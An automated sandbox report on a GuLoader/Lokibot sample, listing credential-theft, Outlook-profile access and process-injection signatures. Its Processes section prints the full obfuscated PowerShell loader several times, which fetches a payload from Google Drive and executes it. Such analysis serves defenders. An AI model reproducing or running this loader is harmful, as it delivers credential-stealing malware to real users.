Malware Analysis Report

2024-11-30 23:46

Sample ID 240917-m4jf9szbpj
Target 5c0efea627341c89a4ee3eb88570f75545c9553997182341247830efee48fc02
SHA256 5c0efea627341c89a4ee3eb88570f75545c9553997182341247830efee48fc02
Tags
guloader lokibot collection credential_access discovery downloader spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5c0efea627341c89a4ee3eb88570f75545c9553997182341247830efee48fc02

Threat Level: Known bad

The file 5c0efea627341c89a4ee3eb88570f75545c9553997182341247830efee48fc02 was found to be: Known bad.

Malicious Activity Summary

guloader lokibot collection credential_access discovery downloader spyware stealer trojan

Guloader,Cloudeye

Lokibot

Credentials from Password Stores: Credentials from Web Browsers

Blocklisted process makes network request

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Accesses Microsoft Outlook profiles

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

System Location Discovery: System Language Discovery

Enumerates physical storage devices

outlook_office_path

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: CmdExeWriteProcessMemorySpam

outlook_win_path

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-17 11:01

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-17 11:01

Reported

2024-09-17 11:03

Platform

win7-20240903-en

Max time kernel

145s

Max time network

147s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\A beérkezett kérelem visszaigazolása.vbe"

Signatures

Guloader,Cloudeye

downloader guloader

Lokibot

trojan spyware stealer lokibot

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Accesses Microsoft Outlook profiles

collection
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wabmig.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wabmig.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wabmig.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\windows mail\wabmig.exe | N/A
N/A | N/A | C:\Program Files (x86)\windows mail\wabmig.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Program Files (x86)\windows mail\wabmig.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 2624 set thread context of 2672 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wabmig.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\windows mail\wabmig.exe | N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wabmig.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2588 wrote to memory of 3060 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2588 wrote to memory of 3060 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2588 wrote to memory of 3060 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3060 wrote to memory of 2820 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 3060 wrote to memory of 2820 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 3060 wrote to memory of 2820 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 3060 wrote to memory of 2616 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 3060 wrote to memory of 2616 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 3060 wrote to memory of 2616 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 2616 wrote to memory of 2624 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2616 wrote to memory of 2624 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2616 wrote to memory of 2624 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2616 wrote to memory of 2624 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 2348 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 2624 wrote to memory of 2348 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 2624 wrote to memory of 2348 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 2624 wrote to memory of 2348 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 2624 wrote to memory of 2672 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wabmig.exe
PID 2624 wrote to memory of 2672 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wabmig.exe
PID 2624 wrote to memory of 2672 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wabmig.exe
PID 2624 wrote to memory of 2672 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wabmig.exe
PID 2624 wrote to memory of 2672 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wabmig.exe
PID 2624 wrote to memory of 2672 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wabmig.exe

outlook_office_path

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wabmig.exe | N/A

outlook_win_path

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wabmig.exe | N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\A beérkezett kérelem visszaigazolása.vbe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Sulfamidic Gavelling Distributrnettet Torturingly Begunstige Confessionalism Crawley #>;$Ratebetalingsntercommunication='Humrforladtes';<#turnhalle Drouths Resistable Lighedspunkt Olu #>;$Ratebetalingsnteressefelt=$host.PrivateData;If ($Ratebetalingsnteressefelt) {$Didymitis++;}function Germania($Barnligt){$Citraternes142=$Barnligt.Length-$Didymitis;for( $Ratebetalings=5;$Ratebetalings -lt $Citraternes142;$Ratebetalings+=6){$Bladmaver+=$Barnligt[$Ratebetalings];}$Bladmaver;}function Talekanalen($Hjertebaandets){ & ($Remans) ($Hjertebaandets);}$Dermoreaction=Germania 'Fo urM He.toL giczCh lciSt yglmethol Sanda,xagg/Nonac5 ogn. Pole0ove.g Sa tl( HypoWS.mteiDruesnAfskidFremfo D giw SoubsSafir SkydeNKtterT,ylvt Inve1Lyso,0 lodt.Enami0Recur;Unrob Miz aWObl viMucednSilki6 Syre4Count;Fi ma ,eskxUdlej6Stnin4Catac;Perso Di.nfrUndisvSundh:Highh1U ion2Asy e1Tingh.Carra0Appr )Pikan .etsmGUdsaveMoistcForovk liosoForar/Unmil2Unpre0 ba a1Still0Swoon0T lre1Slage0 Ekse1 Aug ,utaFSubheiBr.ebrcholteHospif UartoKry,rxCofa /t kis1Nonpe2 bast1Intre. 
land0 vden ';$Ostealgia=Germania ' AlecUopt.gsNonseeTruckRglott- udieAOveraGRead EFeyesn D,miTRec l ';$Aerosiderolite=Germania 'FoundhLnpost Tehatart.rp be hsHeadr:Fem r/Hyper/Varmed ildr EnetiDrv yvK proeTrito.Ciss gMllesoMan eoTwop g HypolWieraeRegne.brndbcraakooLy phmDeuto/ReturuGispecF odh?KoloneGre.nxInfrepFuldaoLse rrZoophtBensk=BekosdUn onoSammewEctronVavasl AssuoFlageaArbejdnonme&R gioireassdPlanc=Pendl1SplenhEmbas3Ar owUKa.acp ildLDaareFforkmJBackwEPat lzAr ejo MelgG tinsrEsophSOrg,nvP rhaQSynsvRShiveqko stZUnderD egnf5 KvadMRedniUStudeuDyrenGreparb GonodA,cur3ArbouS Sa.tZ revaGPriviVAkkumSDupli ';$Datamaskinelles=Germania ' arce>melle ';$Remans=Germania 'RiddeIOutuseSu.erXGenti ';$Transmits='Dani';$Helhesten147 = Germania 'Me hjeRainfc Varih KoleoDupli Adels%EnthuaTrimnpTr.lnp.arvedTro ra.nwout Ciroa Perp% Il p\ EuctRHeraco Perob Enklo,jaltr otaa R,dgtUndereBivir.skat,UAutoinAn ihs Sprn Arbor&Salme&Water KanoneAlgaec.epiahHfligo lori Ass,ctBullb ';Talekanalen (Germania 'C eck$A damgTartel NutroMarnab ,upeaRanchlBnh e: YderGomstbaUnirrlEtn ge rrepnFaktoiSektetHelafeAl issRacem6,ispe9Ugand=Immes(S pplcT.kmlmSm ltdFored Beco,/Susp cMa hi Bumse$FastiH k lteSoapmlOpsonh.ilfleBasonsHy ektInco.eBes fnHns.r1Forge4Parmi7Sidia) Adon ');Talekanalen (Germania 'undko$RomavgFrag l RecaoLikv bEnchaaArbe.lKra,e:.tateOChevyufalsttSkrivsC mbup Par,aCratonGallesdiscr=Super$ UsikAGeodteOd.nsr Ant.oCribbsSpooniVirtudChicoekollerveksloUd,ollSlidsiHeltitLympheLyng . Ob us trep Cardlfuldbi L vetLaic,(Snegl$Un erD.odesaE.doctKropsaEnmarmRefraaHjlp sU.malkMetafi SrinnAcrobeTr.djl TraplImmoreUddansDemar)B lli ');Talekanalen (Germania 'Toned[SatinN ravmeOldfatPosth.DemokSF edaeIldskrFlyvevFrag.iR bidcViolieS.rapPDelegoMesmeiTrngsn ivertDy epMRepolaBemoun.amilaDummygCissoePanadrSp in]rdlig:Gavst:Hk.enSUnfeleBlegdcHalvfuE.orbrStartiSq,artTaktfy ubisPUnimirChrysojubustrem uoHippocPara oCosmolSyndi ecur=pu.le Spe c[ Imp NSol ie HebdtLetfa. 
CounSEgomaeUrinic RetsuYmperrProz iTe,mitAdapty PneuPOphidr T deo ArtetBill o tedfcPara o Forsl AnthTFo giy Consp Kn teS esk] Spin:Land :OutsoTCompalKropesMetap1Clyde2Disc ');$Aerosiderolite=$Outspans[0];$Superhistorical= (Germania 'Ge,yt$StorrgSvinelA.matO HypobSl.taA indl rif:N.ndiRSupraEGe,eiUD,fectDaaseI An elAscriiJ.ylesRembuI BagsNMalicgTripa=BirdsN Ops.E CintWMisco-T ombO NrinBVammeJnanniE CapacAmbleTAtten BjrkesTautoy ritcsSkilltFamoue wungm Vulv.Part.n LangeFleett Ydel. b.dwwKnfale PladBTryllC SideLSign I Kamme.pasmNUnr,pt');$Superhistorical+=$Galenites69[1];Talekanalen ($Superhistorical);Talekanalen (Germania 'Ch,et$forktRSlimmeDe.tsu EnketReobsiChlorl rocriDekorsUrethiDecyln Brang Stip. SprjHKatteeElemhaGuilfdBru ee SoverRew dsModfo[Kniks$ edraOBand skberntStatse nrasa ForblSo,acgMyrrhiLudolaBolth]Ove,b=Cryst$AntisDMaggieOpstnr c ramMultioVerdir PreyeEre oa ippecFunkttWindoiTrus.oUs.ornC,rne ');$Innest=Germania 'Desmo$ProviRDe igeAnisbuAdjutt Kar iBib,ilBadg.iNrsynsOrgani SekunPretagRe zi.OverdD.uftfoL kalwmanihn AsfmlMatrioJordba Hyald KosmF,lathi NonilBegree Ridg( part$barnaAM.sabeHorserP pilo Klges BrseiSke ldU aeneBarserTeleooDel,glSan,tiNavnltko mae Espa,Unath$ ErinMHampeeVegstrSekstoEf ulpRaadmi SupeaCompusHolla),ruta ';$Meropias=$Galenites69[0];Talekanalen (Germania 'He.mi$OverbGStikllEnligOso erBFeti,aP,efoLUefte:kulsoPSpknilKugleeSuperCPr sit Del,R .imaE Spor=Borup(MadagTMe,iaeEye oSGuldaTUefte-AnkomPAr,olANonentE helhSnob Rid,e$Dechem Ul,reN,rmaRIdnhkOFrostPFinjuiDenizABe iasSu,ps)Straf ');while (!$Plectre) {Talekanalen (Germania 'Cockn$ Ind.g OrielOd ntoSemi,bVr.ihaUnderl onna:HimmeBSensaoMalobrtrgretuntorlDim noFibrod etad L akeSuperrMet p=fr mk$FilostDisplrDupwaubyggeePhala ') ;Talekanalen $Innest;Talekanalen (Germania 'SyzygSFl.rttFu hia entrrSjlfutKopie-Ca vaSCivi l ,cieeIodo.eRingvpTredv Virre4Forud ');Talekanalen (Germania 'Fremt$StiktgPr aclKattioHydribUbehaaFrnnelClino: SkipPByguelTropieBrn,ec DiabtShemir Cavee 
Hand=Abiet(AmbolTSabl.eRehidsVov htAmmod-For rPMyofiaPiotetU neahSnegl Puff $SplinMJawtwe AntirFr vloSpitepatt niCo.ntaGlottsU ork)Skip ') ;Talekanalen (Germania 'Aphod$HoboigCy,tol Almbo.ekatbre teaS okklKnowi:SlaaeFskjoreBas.bcReferuGlgninBa bldPamp,aSkumgtGligaiGr skoSterlnVulpe= S or$phallgu clol Chono IndibRvesaaPussll Bevi: Sv tVCircue ortsr nodb ytmia UngalPol.iiDermazFrysee Feus+Fitti+Staff% .orm$ In,aO Vagtu DgndtSljens,rfabpHandsaTaut.nSt lds Rels.BackrcSkorpoLsgnguSe imn onktSpeci ') ;$Aerosiderolite=$Outspans[$Fecundation];}$Afskumningernes=320006;$Fragtraterne=29409;Talekanalen (Germania ' Endo$ VrksgFabullWetcho Its b Opt.aAmarylEksku:.kikkv.ndryaPedalaSnurpbPentae Ta.inFiffis KompmCalamuCul eg Telel dmugirigsanAt ragmi ros Ness Samp=Bevir NonsGAgoraeDublet eks-forsiCtineioDr ukn .glitMa cae ilbanVejentQuara Gedeh$ParocM CocheFinkmrQidnooSmertpLalpai UncaaOu,grsStrsk ');Talekanalen (Germania 'Glaum$VendigCreatl.oddeoMrk,pbBeaanaMentalWobl :SteriDBor ojForbivBilfoethermlskralsDo nwk,ncomeIn stsDe re Af.an=Shoes Kabin[LimfaS SavkyLaborsBatiktDetoneriddlmudp r.Eq iaCP ehaoSp ldnErganv Drape Cicar orldtPsi,o]Adj d:Jus i:AstraFUnvisrRe ieoBorgemReserBFirmaaStedesofficePref,6Impr,4Ma orSNonsutBarchrNyhediLnpronPossig elfr(humid$ t anvRe,isa TimoaPontibBorgeeVagtsnIntersRammemsmkreu,phthgGlyoxlFunktiAlsi.nP.ocegRecapsstruk)Adun ');Talekanalen (Germania 'Ragin$autofgPrecolKukstoSor ib C noa ollalPhosp:J.ledDAspiryScourrAlde,t ,yppi Videdsherie forhrOktaenVred eKron. 
Tildr=Prewr tachy[ dersSBararySe,resCatalt barheDaginmAra,a.Ha,roThalvaeClusixEn ydtConst.FyldeE Beh.nSu pacRaadioRugmedPantei,amblnU rangSvlge]Cor o:barse:AnecdABam uSpile COutbrIGreg,Iberve.V skeGBlowge PagitDdsfoSplacitNettor MyeliUndernOv rcgepemb(polys$Spo vDDea ljBrillvEvil e ParalkatjasMakrokInd ae Equas,esth)U der ');Talekanalen (Germania 'Bedst$BanjogAntislSk ifoSkovsbNeonsaUdgralAfskr:sw shI brennCoexitInspie ForbgNoteauNabofmBedyreGentanBortdtmrklaaAlrunlUndk,=Ta tr$MiscoDBjergySalinr ajortEjakui allid Bl,fetidsbrStentn N tae Anti. ompasAvelluAccombunfa.sRea rtGas.rr BelgiBestrnAsshog Scan( U,in$SlrinASu laf Li osSubvekLurdau a admNeissn Ov,riVigtenF gesgViolieUnscrr KontnBoysrean mas Om u, .ank$ Ro.tFLjpesrFasteaTilb,gSkakbtSuperrvil yaskrmmt,venee CamprfolkenTegnieunneu)Unren ');Talekanalen $Integumental;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Roborate.Uns && echo t"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Sulfamidic Gavelling Distributrnettet Torturingly Begunstige Confessionalism Crawley #>;$Ratebetalingsntercommunication='Humrforladtes';<#turnhalle Drouths Resistable Lighedspunkt Olu #>;$Ratebetalingsnteressefelt=$host.PrivateData;If ($Ratebetalingsnteressefelt) {$Didymitis++;}function Germania($Barnligt){$Citraternes142=$Barnligt.Length-$Didymitis;for( $Ratebetalings=5;$Ratebetalings -lt $Citraternes142;$Ratebetalings+=6){$Bladmaver+=$Barnligt[$Ratebetalings];}$Bladmaver;}function Talekanalen($Hjertebaandets){ & ($Remans) ($Hjertebaandets);}$Dermoreaction=Germania 'Fo urM He.toL giczCh lciSt yglmethol Sanda,xagg/Nonac5 ogn. Pole0ove.g Sa tl( HypoWS.mteiDruesnAfskidFremfo D giw SoubsSafir SkydeNKtterT,ylvt Inve1Lyso,0 lodt.Enami0Recur;Unrob Miz aWObl viMucednSilki6 Syre4Count;Fi ma ,eskxUdlej6Stnin4Catac;Perso Di.nfrUndisvSundh:Highh1U ion2Asy e1Tingh.Carra0Appr )Pikan .etsmGUdsaveMoistcForovk liosoForar/Unmil2Unpre0 ba a1Still0Swoon0T lre1Slage0 Ekse1 Aug ,utaFSubheiBr.ebrcholteHospif UartoKry,rxCofa /t kis1Nonpe2 bast1Intre. 
land0 vden ';$Ostealgia=Germania ' AlecUopt.gsNonseeTruckRglott- udieAOveraGRead EFeyesn D,miTRec l ';$Aerosiderolite=Germania 'FoundhLnpost Tehatart.rp be hsHeadr:Fem r/Hyper/Varmed ildr EnetiDrv yvK proeTrito.Ciss gMllesoMan eoTwop g HypolWieraeRegne.brndbcraakooLy phmDeuto/ReturuGispecF odh?KoloneGre.nxInfrepFuldaoLse rrZoophtBensk=BekosdUn onoSammewEctronVavasl AssuoFlageaArbejdnonme&R gioireassdPlanc=Pendl1SplenhEmbas3Ar owUKa.acp ildLDaareFforkmJBackwEPat lzAr ejo MelgG tinsrEsophSOrg,nvP rhaQSynsvRShiveqko stZUnderD egnf5 KvadMRedniUStudeuDyrenGreparb GonodA,cur3ArbouS Sa.tZ revaGPriviVAkkumSDupli ';$Datamaskinelles=Germania ' arce>melle ';$Remans=Germania 'RiddeIOutuseSu.erXGenti ';$Transmits='Dani';$Helhesten147 = Germania 'Me hjeRainfc Varih KoleoDupli Adels%EnthuaTrimnpTr.lnp.arvedTro ra.nwout Ciroa Perp% Il p\ EuctRHeraco Perob Enklo,jaltr otaa R,dgtUndereBivir.skat,UAutoinAn ihs Sprn Arbor&Salme&Water KanoneAlgaec.epiahHfligo lori Ass,ctBullb ';Talekanalen (Germania 'C eck$A damgTartel NutroMarnab ,upeaRanchlBnh e: YderGomstbaUnirrlEtn ge rrepnFaktoiSektetHelafeAl issRacem6,ispe9Ugand=Immes(S pplcT.kmlmSm ltdFored Beco,/Susp cMa hi Bumse$FastiH k lteSoapmlOpsonh.ilfleBasonsHy ektInco.eBes fnHns.r1Forge4Parmi7Sidia) Adon ');Talekanalen (Germania 'undko$RomavgFrag l RecaoLikv bEnchaaArbe.lKra,e:.tateOChevyufalsttSkrivsC mbup Par,aCratonGallesdiscr=Super$ UsikAGeodteOd.nsr Ant.oCribbsSpooniVirtudChicoekollerveksloUd,ollSlidsiHeltitLympheLyng . Ob us trep Cardlfuldbi L vetLaic,(Snegl$Un erD.odesaE.doctKropsaEnmarmRefraaHjlp sU.malkMetafi SrinnAcrobeTr.djl TraplImmoreUddansDemar)B lli ');Talekanalen (Germania 'Toned[SatinN ravmeOldfatPosth.DemokSF edaeIldskrFlyvevFrag.iR bidcViolieS.rapPDelegoMesmeiTrngsn ivertDy epMRepolaBemoun.amilaDummygCissoePanadrSp in]rdlig:Gavst:Hk.enSUnfeleBlegdcHalvfuE.orbrStartiSq,artTaktfy ubisPUnimirChrysojubustrem uoHippocPara oCosmolSyndi ecur=pu.le Spe c[ Imp NSol ie HebdtLetfa. 
CounSEgomaeUrinic RetsuYmperrProz iTe,mitAdapty PneuPOphidr T deo ArtetBill o tedfcPara o Forsl AnthTFo giy Consp Kn teS esk] Spin:Land :OutsoTCompalKropesMetap1Clyde2Disc ');$Aerosiderolite=$Outspans[0];$Superhistorical= (Germania 'Ge,yt$StorrgSvinelA.matO HypobSl.taA indl rif:N.ndiRSupraEGe,eiUD,fectDaaseI An elAscriiJ.ylesRembuI BagsNMalicgTripa=BirdsN Ops.E CintWMisco-T ombO NrinBVammeJnanniE CapacAmbleTAtten BjrkesTautoy ritcsSkilltFamoue wungm Vulv.Part.n LangeFleett Ydel. b.dwwKnfale PladBTryllC SideLSign I Kamme.pasmNUnr,pt');$Superhistorical+=$Galenites69[1];Talekanalen ($Superhistorical);Talekanalen (Germania 'Ch,et$forktRSlimmeDe.tsu EnketReobsiChlorl rocriDekorsUrethiDecyln Brang Stip. SprjHKatteeElemhaGuilfdBru ee SoverRew dsModfo[Kniks$ edraOBand skberntStatse nrasa ForblSo,acgMyrrhiLudolaBolth]Ove,b=Cryst$AntisDMaggieOpstnr c ramMultioVerdir PreyeEre oa ippecFunkttWindoiTrus.oUs.ornC,rne ');$Innest=Germania 'Desmo$ProviRDe igeAnisbuAdjutt Kar iBib,ilBadg.iNrsynsOrgani SekunPretagRe zi.OverdD.uftfoL kalwmanihn AsfmlMatrioJordba Hyald KosmF,lathi NonilBegree Ridg( part$barnaAM.sabeHorserP pilo Klges BrseiSke ldU aeneBarserTeleooDel,glSan,tiNavnltko mae Espa,Unath$ ErinMHampeeVegstrSekstoEf ulpRaadmi SupeaCompusHolla),ruta ';$Meropias=$Galenites69[0];Talekanalen (Germania 'He.mi$OverbGStikllEnligOso erBFeti,aP,efoLUefte:kulsoPSpknilKugleeSuperCPr sit Del,R .imaE Spor=Borup(MadagTMe,iaeEye oSGuldaTUefte-AnkomPAr,olANonentE helhSnob Rid,e$Dechem Ul,reN,rmaRIdnhkOFrostPFinjuiDenizABe iasSu,ps)Straf ');while (!$Plectre) {Talekanalen (Germania 'Cockn$ Ind.g OrielOd ntoSemi,bVr.ihaUnderl onna:HimmeBSensaoMalobrtrgretuntorlDim noFibrod etad L akeSuperrMet p=fr mk$FilostDisplrDupwaubyggeePhala ') ;Talekanalen $Innest;Talekanalen (Germania 'SyzygSFl.rttFu hia entrrSjlfutKopie-Ca vaSCivi l ,cieeIodo.eRingvpTredv Virre4Forud ');Talekanalen (Germania 'Fremt$StiktgPr aclKattioHydribUbehaaFrnnelClino: SkipPByguelTropieBrn,ec DiabtShemir Cavee 
Hand=Abiet(AmbolTSabl.eRehidsVov htAmmod-For rPMyofiaPiotetU neahSnegl Puff $SplinMJawtwe AntirFr vloSpitepatt niCo.ntaGlottsU ork)Skip ') ;Talekanalen (Germania 'Aphod$HoboigCy,tol Almbo.ekatbre teaS okklKnowi:SlaaeFskjoreBas.bcReferuGlgninBa bldPamp,aSkumgtGligaiGr skoSterlnVulpe= S or$phallgu clol Chono IndibRvesaaPussll Bevi: Sv tVCircue ortsr nodb ytmia UngalPol.iiDermazFrysee Feus+Fitti+Staff% .orm$ In,aO Vagtu DgndtSljens,rfabpHandsaTaut.nSt lds Rels.BackrcSkorpoLsgnguSe imn onktSpeci ') ;$Aerosiderolite=$Outspans[$Fecundation];}$Afskumningernes=320006;$Fragtraterne=29409;Talekanalen (Germania ' Endo$ VrksgFabullWetcho Its b Opt.aAmarylEksku:.kikkv.ndryaPedalaSnurpbPentae Ta.inFiffis KompmCalamuCul eg Telel dmugirigsanAt ragmi ros Ness Samp=Bevir NonsGAgoraeDublet eks-forsiCtineioDr ukn .glitMa cae ilbanVejentQuara Gedeh$ParocM CocheFinkmrQidnooSmertpLalpai UncaaOu,grsStrsk ');Talekanalen (Germania 'Glaum$VendigCreatl.oddeoMrk,pbBeaanaMentalWobl :SteriDBor ojForbivBilfoethermlskralsDo nwk,ncomeIn stsDe re Af.an=Shoes Kabin[LimfaS SavkyLaborsBatiktDetoneriddlmudp r.Eq iaCP ehaoSp ldnErganv Drape Cicar orldtPsi,o]Adj d:Jus i:AstraFUnvisrRe ieoBorgemReserBFirmaaStedesofficePref,6Impr,4Ma orSNonsutBarchrNyhediLnpronPossig elfr(humid$ t anvRe,isa TimoaPontibBorgeeVagtsnIntersRammemsmkreu,phthgGlyoxlFunktiAlsi.nP.ocegRecapsstruk)Adun ');Talekanalen (Germania 'Ragin$autofgPrecolKukstoSor ib C noa ollalPhosp:J.ledDAspiryScourrAlde,t ,yppi Videdsherie forhrOktaenVred eKron. 
Tildr=Prewr tachy[ dersSBararySe,resCatalt barheDaginmAra,a.Ha,roThalvaeClusixEn ydtConst.FyldeE Beh.nSu pacRaadioRugmedPantei,amblnU rangSvlge]Cor o:barse:AnecdABam uSpile COutbrIGreg,Iberve.V skeGBlowge PagitDdsfoSplacitNettor MyeliUndernOv rcgepemb(polys$Spo vDDea ljBrillvEvil e ParalkatjasMakrokInd ae Equas,esth)U der ');Talekanalen (Germania 'Bedst$BanjogAntislSk ifoSkovsbNeonsaUdgralAfskr:sw shI brennCoexitInspie ForbgNoteauNabofmBedyreGentanBortdtmrklaaAlrunlUndk,=Ta tr$MiscoDBjergySalinr ajortEjakui allid Bl,fetidsbrStentn N tae Anti. ompasAvelluAccombunfa.sRea rtGas.rr BelgiBestrnAsshog Scan( U,in$SlrinASu laf Li osSubvekLurdau a admNeissn Ov,riVigtenF gesgViolieUnscrr KontnBoysrean mas Om u, .ank$ Ro.tFLjpesrFasteaTilb,gSkakbtSuperrvil yaskrmmt,venee CamprfolkenTegnieunneu)Unren ');Talekanalen $Integumental;"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Sulfamidic Gavelling Distributrnettet Torturingly Begunstige Confessionalism Crawley #>;$Ratebetalingsntercommunication='Humrforladtes';<#turnhalle Drouths Resistable Lighedspunkt Olu #>;$Ratebetalingsnteressefelt=$host.PrivateData;If ($Ratebetalingsnteressefelt) {$Didymitis++;}function Germania($Barnligt){$Citraternes142=$Barnligt.Length-$Didymitis;for( $Ratebetalings=5;$Ratebetalings -lt $Citraternes142;$Ratebetalings+=6){$Bladmaver+=$Barnligt[$Ratebetalings];}$Bladmaver;}function Talekanalen($Hjertebaandets){ & ($Remans) ($Hjertebaandets);}$Dermoreaction=Germania 'Fo urM He.toL giczCh lciSt yglmethol Sanda,xagg/Nonac5 ogn. Pole0ove.g Sa tl( HypoWS.mteiDruesnAfskidFremfo D giw SoubsSafir SkydeNKtterT,ylvt Inve1Lyso,0 